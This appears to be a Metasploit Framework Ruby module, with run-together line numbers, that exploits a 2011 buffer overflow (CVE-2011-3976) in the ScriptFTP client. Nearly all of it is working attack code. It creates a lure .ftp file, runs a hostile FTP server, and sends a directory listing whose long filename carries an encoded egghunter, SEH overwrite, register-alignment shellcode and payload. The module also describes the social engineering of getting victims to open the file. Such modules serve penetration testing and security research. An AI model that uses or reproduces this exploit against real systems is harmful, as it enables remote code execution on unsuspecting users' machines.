Path: blob/master/modules/exploits/windows/ftp/scriptftp_list.rb
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45class MetasploitModule < Msf::Exploit::Remote6Rank = GoodRanking78include Msf::Exploit::Remote::FtpServer9include Msf::Exploit::FILEFORMAT10include Msf::Exploit::Egghunter1112def initialize(info = {})13super(update_info(info,14'Name' => 'ScriptFTP LIST Remote Buffer Overflow',15'Description' => %q{16AmmSoft's ScriptFTP client is susceptible to a remote buffer overflow17vulnerability that is triggered when processing a sufficiently long18filename during a FTP LIST command resulting in overwriting the19exception handler. Social engineering of executing a specially crafted20ftp file by double click will result in connecting to our malicious21server and perform arbitrary code execution which allows the attacker to22gain the same rights as the user running ScriptFTP. This vulnerability23affects versions 3.3 and earlier.24},25'License' => MSF_LICENSE,26'Author' =>27[28'modpr0be', #Vulnerability discovery and original exploit29'TecR0c <roccogiovannicalvi[at]gmail.com>', # Metasploit module30'mr_me <steventhomasseeley[at]gmail.com>', # Metasploit module31],32'References' =>33[34[ 'CVE', '2011-3976' ],35[ 'OSVDB', '75633' ],36[ 'EDB', '17876' ],37[ 'US-CERT-VU', '440219' ]38],39'DefaultOptions' =>40{41'EXITFUNC' => 'thread',42'DisablePayloadHandler' => false43},44'Payload' =>45{46'BadChars' => "\x00\xff\x0d\x5c\x2f\x0a",47'EncoderType' => Msf::Encoder::Type::AlphanumMixed,48'EncoderOptions' =>49{50'BufferRegister' => 'EDI', # Egghunter jmp edi51}52},53'Platform' => 'win',54'Targets' =>55[56# CALL DWORD PTR SS:[EBP-4]57# scriptftp.exe - File version=Build 3/9/200958[ 'Windows XP SP3 / Windows Vista', { 'Offset' => 1746, 'Ret' => "\xd6\x41" } ],59],60'Privileged' => false,61'DisclosureDate' => '2011-10-12',62'DefaultTarget' => 0))6364register_options(65[66OptString.new('FILENAME', [ true, 'The file name.', 'msf.ftp']),67])6869end7071def 
setup72if datastore['SRVHOST'] == '0.0.0.0'73lhost = Rex::Socket.source_address('50.50.50.50')74else75lhost = datastore['SRVHOST']76end7778ftp_file = "OPENHOST('#{lhost}','ftp','ftp')\r\n"79ftp_file << "SETPASSIVE(ENABLED)\r\n"80ftp_file << "GETLIST($list,REMOTE_FILES)\r\n"81ftp_file << "CLOSEHOST\r\n"8283print_status("Creating '#{datastore['FILENAME']}'...")84file_create(ftp_file)85super86end878889def on_client_unknown_command(c,cmd,arg)90c.put("200 OK\r\n")91end9293def on_client_command_list(c,arg)9495conn = establish_data_connection(c)96if(not conn)97c.put("425 Can't build data connection\r\n")98return99end100101print_status(" - Data connection set up")102code = 150103c.put("#{code} Here comes the directory listing.\r\n")104105code = 226106c.put("#{code} Directory send ok.\r\n")107108eggoptions =109{110:checksum => false,111:eggtag => 'cure'112}113114hunter, egg = generate_egghunter(payload.encoded, payload_badchars, eggoptions)115116# Encode with alphamixed, then unicode mixed117[ 'x86/alpha_mixed', 'x86/unicode_mixed' ].each { |name|118enc = framework.encoders.create(name)119if name =~ /unicode/120# aligned to ESP & EAX121enc.datastore.import_options_from_hash({ 'BufferRegister' => 'EAX' })122else123enc.datastore.import_options_from_hash({ 'BufferRegister' => 'EDX' })124end125# NOTE: we already eliminated badchars126hunter = enc.encode(hunter, nil, nil, platform)127if name =~/alpha/128#insert getpc_stub & align EDX, unicode encoder friendly.129#Hardcoded stub is not an issue here because it gets encoded anyway130getpc_stub = "\x89\xe1\xdb\xcc\xd9\x71\xf4\x5a\x83\xc2\x41\x83\xea\x35"131hunter = getpc_stub + hunter132end133}134135unicode_nop = "\x6d" # DD BYTE PTR DS:[ECX],AL136137nseh = "\x61" << unicode_nop138seh = target.ret139140alignment = "\x54" # PUSH ESP141alignment << unicode_nop142alignment << "\x58" # POP EAX143alignment << unicode_nop144alignment << "\x05\x12\x11" # ADD EAX,11001200145alignment << unicode_nop146alignment << "\x2d\x01\x01" # SUB 
EAX,1000100147alignment << unicode_nop148alignment << "\x2d\x01\x10" # SUB EAX,10000100149alignment << unicode_nop150alignment << "\x50" # PUSH EAX151alignment << unicode_nop152alignment << "\xc3" # RETN153154buffer = rand_text_alpha(656)155buffer << hunter156buffer << rand_text_alpha(target['Offset']-buffer.length)157buffer << nseh158buffer << seh159buffer << alignment160buffer << rand_text_alpha(500)161buffer << egg162163print_status(" - Sending directory list via data connection")164dirlist = "-rwxr-xr-x 5 ftpuser ftpusers 512 Jul 26 2001 #{buffer}.txt\r\n"165dirlist << " 5 ftpuser ftpusers 512 Jul 26 2001 A\r\n"166dirlist << "rwxr-xr-x 5 ftpuser ftpusers 512 Jul 26 2001 #{buffer}.txt\r\n"167168conn.put(dirlist)169conn.close170return171end172end173174175